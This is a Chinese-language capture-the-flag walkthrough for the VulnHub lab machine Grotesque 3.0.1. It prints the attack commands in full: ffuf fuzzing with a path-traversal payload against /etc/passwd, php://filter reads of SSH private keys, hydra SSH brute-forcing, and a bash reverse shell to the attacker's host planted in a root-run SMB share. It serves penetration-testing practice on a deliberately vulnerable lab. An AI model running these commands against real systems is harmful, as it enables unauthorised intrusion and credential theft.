vulnhub靶场之GROTESQUE: 3.0.1

准备：

攻击机：虚拟机kali、本机win10。

靶机：Grotesque: 3.0.1，下载地址：https://download.vulnhub.com/grotesque/grotesque3.zip，下载后直接vbox打开即可。

知识点：ffuf参数爆破、定时任务、445端口利用、smbclient使用。

信息收集：

通过nmap扫描下网段内的存活主机地址，确定下靶机的地址：nmap -sn 172.20.10.0/24，获得靶机地址：172.20.10.4。

扫描下端口对应的服务：nmap -T4 -sV -p- -A 172.20.10.4，显示开放了22、80端口，开启了ssh、http服务

目录扫描：

使用dirmap进行目录扫描，发现atlasg.jpg图片，emmmm，访问80端口的时候也能直接查看到该图片。

查看该图片利用steghide尝试获取隐藏信息，但是获取失败，后来发现一个提示信息：m、d和五个x，应该是告诉我们和md5有关。

根据提示生成一个md5字典，这里我们将/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt字典进行md5加密，命令：for i in $(cat directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dirmd5.txt; done。记得替换里面的横线和空格。然后使用gobuster进行目录扫描，发现：/f66b22bf020334b04c7d0d3eb5010391.php。

参数名爆破：

访问：http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php无任何回显信息，源代码信息中也无任何信息。因此尝试使用ffuf进行参数爆破，命令：fuzf -f -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt，但是未扫描出来，然后更换字典，命令：ffuf -u 'http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../../etc/passwd' -w /usr/share/wordlists/dirb/big.txt，发现了参数名：purpose。

爆破ssh密码：

读取/etc/passwd文件，发现账户名：freddie。

使用文件包含漏洞读取下ssh私匙和公匙均读取失败，命令：http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa和http://172.20.10.4/f66b22bf020334b04c7d0d3eb5010391.php?purpose=php://filter/read=convert.base64-encode/resource=/home/freddie/.ssh/id_rsa.pub，然后尝试下使用md5字典爆破下ssh密码，命令：hydra -l freddie -P dirmd5.txt ssh://172.20.10.4，成功获得freddie账户的ssh登录密码：61a4e3e60c063d1e472dd780f64e6cad。

获取shell：

使用获得账户名和密码：freddie/61a4e3e60c063d1e472dd780f64e6cad进行ssh登录，命令：ssh freddie@172.20.10.4，在freddie用户下发现user.txt文件，读取该文件成功获取到flag值。

提权：

查看下当前账户是否存在可以使用的特权命令，sudo -l，显示不存在。

通过：find / -perm -4000 -type f 2>/dev/null来查找下是否存在可疑文件，但是未发现可利用的漏洞。

查看下当前设备开放的端口信息，命令：ss -nutl，发现了445端口。

在kali使用enum4linux 172.20.10.4和smbclient -L 172.20.10.4进行信息收集均失败，但是在靶机中smbclient -L 172.20.10.4执行成功，获得一个目录：grotesque。

进入该目录查看目录信息，命令：smbclient //127.0.0.1/grotesque，发现不存在文件信息。

下载pspy64文件并通过http服务上传到靶机，在靶机执行监控靶机的执行进程，发现靶机中每一分钟会一root权限执行smbshare目录下的文件。

在靶机中写一个反弹shell的脚本，内容：#!/bin/bash   sh -i >& /dev/tcp/172.20.10.7/6688 0>&1。

利用刚才发现的共享文件夹：grotesque，将反弹shell脚本上传到smbshare目录下，然后在kali端开启对6688端口的监听，成功获得反弹的shell并在root目录下读取到flag值。

vulnhub靶场之GROTESQUE: 3.0.1的相关教程结束。